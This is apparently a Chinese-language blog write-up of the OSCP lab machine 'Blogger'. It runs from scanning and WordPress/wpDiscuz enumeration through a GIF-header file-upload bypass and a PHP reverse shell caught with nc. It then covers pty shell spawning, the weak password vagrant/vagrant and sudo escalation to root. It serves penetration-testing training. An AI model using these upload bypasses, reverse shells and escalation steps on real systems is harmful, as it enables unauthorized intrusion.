芝士土拨鼠
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
OSCP靶机-------Blogger
今天来打一个OSCP的靶机,难度偏高,包含了端口探测,服务探测,ssh弱口令,CMS识别,文件上传绕过,nc反弹shell,sudo提权等等…靶场难度中等偏高,需要收集两个flag,一个flag低权限shell就可以获取,第二个要提权后才可以获取。希望大家看完可以有所收获。
启动环境
启动VPN:openvpn universal.ovpn
攻击机IP为:192.168.45.181
启动目标靶机:
目标靶机IP为: 192.168.187.217
信息收集
1.端口
nmap扫描端口nmap --min-rate 10000 -p- 192.168.187.217
只有22,80两个端口
22-ssh 80-http
2.端口测试
2.122-ssh
手工弱口令登一下试试。ssh root@192.168.187.217 -p 22
ssh公钥有问题,无法继续。那么想用hydra爆破也就行不通了。
2.180-http
访问192.168.187.217:80
看上去很精致,应该黑丝有cms,直接查一下。whatweb http://192.168.187.217:80
匪夷所思,是blogger么?msf搜一下。msfconsole
searchsploit Blogger
没有。换思路,看一下源码:curl http://192.168.187.217:80
没什么有用的信息。那就dirsearch扫一下目录。dirsearch -u http://192.168.187.217
看一下assets。
访问192.168.187.217:80/assets
是一个目录遍历。就是这个网站的一些css、js、fonts图标等等。
不过在fonts中有一个blog文件。看上去在记录owasp top10。
随便点点,发现会跳转到一个域名blogger.thm。
看上去要绑定hosts:vim /etc/hosts
然后在最后加上192.168.187.217 blogger.thm
再次访问刚才的blog站点。正常咯。
看一下cms:whatweb http://blogger.thm/assets/fonts/blog/
cms是WordPress 4.9.8,搜一下exp看看。msfconsole
searchsploit WordPress 4.9.8
全是插件,也没有rce,wp老漏洞大户了,肯定有专门的wp扫描:wpscan
kali里就有,直接用:wpscan --url http://blogger.thm/assets/fonts/blog/
出洞了,http://blogger.thm/assets/fonts/blog/wp-content/uploads/有文件上传。
还是文件遍历,随便点点。发现一个php
点进去发现了gif的文件头。应该网站里是有一个上传图片的地方。慢慢找一下。在wp的页面,owasp top10中有上传图片的地方。
这应该是wordpress的组件,源代码定位一下。
调用的wpdiscuz的组件,抓一下网络的包。
现在确认了版本信息:wpdiscuz 7.0.4
msf搜索expmsfconsole
searchsploit wpdiscuz 7.0.4
search wpdiscuz 7.0.1
use 0
show options
set lhost 192.168.45.181
set rhosts 192.168.187.217
set blogpath /assets/fonts/blog/?p=29
run
失败。。。。回去试试手工文件上传。
经过测试只能上传gif文件,先制作一个图片马。
copy 1.jpg/a +shell.php/b shell.jpg
1.jpg为正常的图片,尽可能选择小点的图片,shell.php 为 php一句话木马。
准备上传,打开burpsuite,抓包改一下文件头看能否上传。并且将后缀改为php。
可以看到上传的位置,直接蚁剑链接。
有shell了!
内网渗透
利用python获取交互shellpython -c "import pty;pty.spawn('/bin/bash')";
获取flag:find / -name local.txt 2>/dev/null
cat /home/james/local.txt
提权
1.sudo提权sudo -l
2.suid提权find / -perm -u=s -type f 2>/dev/null
没合适的。
3.suid-getcap提权/usr/sbin/getcap -r / 2>/dev/null
4.Cron job提权cat /etc/crontab
查找定时任务。
5.内核overlayfs提权lsb_release -a
看看发行版本
Ubuntu 16.04.7 LTS 符合uname -a
看看内核版本
内核版本 4.4.0-206 不符合
都失败了,继续信息收集。
内网信息收集
看一下用户:ls -al /home
看一下是否有隐藏文件ls -al /home/james
内网用户密码弱口令爆破,vagrant/vagrant成功了
但蚁剑好像不太对劲。
这蚁剑的一句话shell就不太行啊,重新拿shell。用kali的webshell:
cp一个出来sudo cp /usr/share/webshells/php/php-reverse-shell.php exp
改后缀。cp php-reverse-shell.php ./shell.jpg
修改监听ip和端口:vim php-reverse-shell.php
nc开启监听:nc -lvvp 1234
上传该文件,burpsuite抓包修改GIF89a头。
nc直接成功getwebshell
二次提权
重复之前的操作,vagrant弱口令登录。
1.sudo提权
存在(ALL) NOPASSWD: ALL
su提权sudo su
提权成功。
获取flag2:cat /root/proof.txt
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)